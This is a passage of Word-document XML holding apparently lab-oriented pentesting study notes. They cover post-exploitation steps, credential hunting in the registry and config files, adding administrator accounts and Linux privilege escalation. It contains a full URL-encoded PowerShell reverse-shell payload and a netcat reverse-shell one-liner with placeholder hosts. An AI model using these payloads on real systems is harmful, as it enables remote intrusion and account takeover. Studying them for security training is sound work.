          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">obtaining RCE is often done with a URL Encoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6A80B" w14:textId="5DFB13FC" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27&lt;IP&gt;%27%2C&lt;PORT&gt;%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A9A58" w14:textId="4202C76B" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>same as shell above but URL encoded to use in GET parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA937F9" w14:textId="0306144A" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>need to change IP and Port before use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B451568" w14:textId="0EE9C72A" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A49BC" w14:textId="39E869E2" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>look for opportunities to gain access to a user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432D3E0" w14:textId="7601B840" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH keys stored in /home/&lt;user&gt;/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B066B68" w14:textId="6DEA0910" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>add own account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AAA6A" w14:textId="77978DEE" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dirty C0w or writeable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/passwd to give </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> access (if open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CD2E2" w14:textId="0104F4AB" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362AEADC" w14:textId="00333645" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>find passwords for running services in registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B59FA0" w14:textId="357F1AEF" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>VNC servers leave passwords in registry stored in plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E7334" w14:textId="77777777" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>FileZilla FTP server in C:\Program Files\FileZilla Server\FileZilla Server.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683904FC" w14:textId="34E93E6C" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or C:\xampp\FileZilla Server\FileZilla Server.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C8B40" w14:textId="76E69363" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MD5 hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B145B6" w14:textId="671758F6" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>obtain a shell running as the SYSTEM user, or an administrator account running with high privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BCC637" w14:textId="721677F3" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">add account </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> log in over RDP, telnet, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63049A17" w14:textId="6040DA6E" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308A745" w14:textId="729A9FD7" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /dynamic-resolution +clipboard /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cert:ignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>v:MACHINE_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>u:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /p:'TryH4ckM3!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70027089" w14:textId="36458170" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>syntax – net user &lt;username&gt; &lt;password&gt; /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23837AA9" w14:textId="0CFE91EB" w:rsidR="0009737B" w:rsidRPr="0084205E" w:rsidRDefault="0009737B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">or net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> administrators &lt;username&gt; /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D30ADE1" w14:textId="0E03D229" w:rsidR="001F04F6" w:rsidRPr="0084205E" w:rsidRDefault="001F04F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Example Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A21E8D" w14:textId="157BBBB1" w:rsidR="001F04F6" w:rsidRPr="0084205E" w:rsidRDefault="001F04F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash – send reverse shell back to a waiting listener in attacker (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA1FB6B" w14:textId="1FBB0503" w:rsidR="001F04F6" w:rsidRPr="0084205E" w:rsidRDefault="001F04F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Payload All </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BBFB03" w14:textId="5605C8DD" w:rsidR="001F04F6" w:rsidRPr="0084205E" w:rsidRDefault="001F04F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BB76E8" w14:textId="6F14F566" w:rsidR="001F04F6" w:rsidRPr="0084205E" w:rsidRDefault="00A0020D" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12174517" w14:textId="28DB75CE" w:rsidR="00A0020D" w:rsidRPr="0084205E" w:rsidRDefault="005F0DB6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Understanding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06431ACF" w14:textId="32D436AC" w:rsidR="005F0DB6" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>the exploitation of a vulnerability, design flaw, and configuration oversights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12423629" w14:textId="52ED34CE" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">critical when performing CTFs or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="710FB7CC" w14:textId="4B2A0AD6" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Direction of Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE8438" w14:textId="77873F4C" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Horizontal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9434AF" w14:textId="4EBD1CB6" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>expand reach over the compromised system by taking over different users who is on the same privilege level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48034CB5" w14:textId="2C7F045E" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>inherit additional files and access permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD741E6" w14:textId="009EF2E7" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vertical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD942CF" w14:textId="4B1720E8" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>higher privileges or access, through existing account that you have already compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51563EDE" w14:textId="4D31EF14" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FADB22D" w14:textId="1188E8EC" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C5C6892" w14:textId="65F12950" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>simple bash script that performs common commands related to privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCAC0B2" w14:textId="2AE86593" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>saves times and allowing more effort to be put toward getting root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D770B" w14:textId="05B03915" w:rsidR="005162AF" w:rsidRPr="0084205E" w:rsidRDefault="005162AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">important to know what it executes </w:t>
      </w:r>
